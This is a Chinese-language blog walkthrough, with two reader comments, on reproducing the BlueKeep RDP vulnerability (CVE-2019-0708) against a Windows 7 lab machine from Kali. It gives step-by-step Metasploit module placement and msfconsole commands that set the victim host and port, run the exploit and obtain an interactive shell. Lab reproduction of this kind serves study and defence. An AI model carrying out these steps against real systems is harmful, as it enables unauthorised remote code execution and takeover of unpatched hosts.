rdp漏洞复现

警告:禁止用于非法用途,仅为学习使用

 

环境

Windows 7 sp1

Kali

exp

0x02 利用

1.一键安装metasploit-framework

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

2.下载Reference中的攻击套件放置文件到msf的相应文件夹

rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

msf命令:

使用msfconsole进入metasploit-framework ,reload_all重新加载0708rdp利用模块


使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP攻击模块

使用set RHOSTS 设置受害机IP

使用set RPORT 设置受害机RDP端口号

使用set target ID数字(可选为0-4)设置受害机机器架构

我使用的是Parallels Desktop,设置target 1

使用exploit开始攻击,等待建立连接

建立连接以后,使用shell获得shell,再使用python获得交互式shell,执行whoami

2 Replies to “rdp漏洞复现”

  1. a

    博主,exp哪下的?

    回复
  2. a

    哦,最新版metasploit已经自带了。

    回复

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注